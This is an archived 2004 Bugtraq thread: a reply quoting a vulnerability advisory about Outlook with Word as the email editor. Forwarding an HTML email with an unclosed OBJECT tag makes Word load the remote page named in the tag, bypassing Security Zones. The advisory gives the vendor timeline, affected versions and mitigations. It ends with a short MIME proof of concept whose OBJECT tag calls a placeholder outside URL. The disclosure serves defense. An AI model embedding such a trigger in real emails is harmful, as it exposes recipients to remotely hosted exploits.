Bugtraq mailing list archives

RE: Microsoft Word Email Object Data Vulnerability


From: "Drew Copley" <dcopley () eEye com>
Date: Fri, 9 Jul 2004 10:58:18 -0700

How did you find this? Did someone email this to you? Did
you discover this variation? 

(Being that the original bug was mine, I have some interest
in a new variation being exploited by spammers... especially
if it was genuinely found in the wild.)

And, why is Microsoft ignoring this bug? If you forward
the email it will work (with Word as the editor...)? Yes, 
that may not be a critical variation, but with proper social 
engineering, it would fool some people... especially the 
many who love to forward things such as "Bill Gates will 
buy you a new cell phone if you forward this email"...



-----Original Message-----
From: James C. Slora, Jr. [mailto:james.slora () phra com] 
Sent: Thursday, July 08, 2004 12:52 PM
To: bugtraq () securityfocus com; Windows NTBugtraq Mailing List
Subject: Microsoft Word Email Object Data Vulnerability

==============================================
Microsoft Word Email Object Data Vulnerability
==============================================


==============================================
Summary:
==============================================
Outlook 2000 and 2003 allow execution of remote web pages specified
within the data property of OBJECT tags when there is no 
closing /OBJECT
tag, while forwarding an HTML email message using Word 2000 or 2003 as
the email editor. This behavior happens regardless of Security Zone
settings - it completely ignores them.

Spammed exploits are very much in the wild and are affecting systems
even if the bug is beyond the scope of the spammers' original intent. 

==============================================
Vendor notification: 
==============================================
June 8 - email to secure () microsoft com (no response)
June 14 - email again to secure () microsoft com, initial response came
same day
June 15 through July 2 - Several messages back and forth
July 2 - final and detailed response from Microsoft
Result: They consider it a variation of web bug behavior, and may take
care of it in future Office releases if they decide to modify 
Outlook's
download behavior when forwarding and replying.
 
**********************
Disclaimer: Testing was very limited. There are probably mistakes and
holes in my analysis, and this all needs to be reviewed 
further. Use at
your own risk, no liability for misuse, etc.
**********************

==============================================
Severity: 
==============================================
I consider it at least moderate because large volumes of spam easily
overcome long odds of exploiting it in any given case. Plus 
because many
people believe they are immune to old-fashioned OBJECT data 
exploits if
they are up to date on their patches. Plus the apparent Security Zone
bypass side of it may indicate additional more serious risks in Word
email.

==============================================
Products tested
==============================================
Affected:
Outlook 2003 with MS Word 2003 as the email editor on XP Pro SP1
Outlook 2000 with MS Word 2000 as the email editor on Win2K Pro SP4

Not affected:
Outlook 2003 with its own email editor on XP Pro SP1 
Outlook 2000 with its own email editor on Win2K Pro SP4

Not tested:
No other configurations tested.

==============================================
Details:
==============================================
The OBJECT tag gets processed on any version of Outlook but blocks
ActiveX controls if it is up to patch rev (anything since 2000) with
default Restricted Zone settings. This is working fine on the affected
system until one specific scenario:

When using MS Word as the email editor and forwarding an HTML email
message containing an OBJECT tag with no closing /OBJECT, MS Word
downloads the page referred to in the "data" property of the 
OBJECT with
no prompt to the user.

So if the user forwards a spam message to someone (such as their mail
administrator), the user may infect their own computer.

This only works when forwarding a message - not when replying. It also
only appears to work if the OBJECT tag is not closed with a /OBJECT.

==============================================
Fix:
==============================================
None available AFAIK

==============================================
Mitigators:
==============================================
- Don't use Word as the email editor
- Don't forward spam messages, just forward headers or source from
Tools>Options
- Filter HTML mail containing OBJECT tags, whether enclosed 
by HTML tags
or not, and especially if there is no closing /OBJECT

Those mitigators stop the execution of the OBJECT data reference

Frequently suggested mitigators that do not help so much:
- Removing the HTA MIME-Type, and killbitting the adodb.stream and
shell.application controls, do not help.
- Outlook Restricted Zone settings do not help.
- Locking down the My Computer security zone does not help.

Those mitigators don't stop execution but may help stop secondary
exploits that might be hosted at the OBJECT data reference.

==============================================
Proof of concept:
==============================================
Check your spam for OBJECT tags that call Web URLs. This stuff is
everywhere. Here is the basic idea:

MIME-Version: 1.0
Content-Type: multipart/alternative;
      boundary="--001"

----001
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

|object data=3D"http://www.foobar.foo/page.php";|

----001--





Current thread: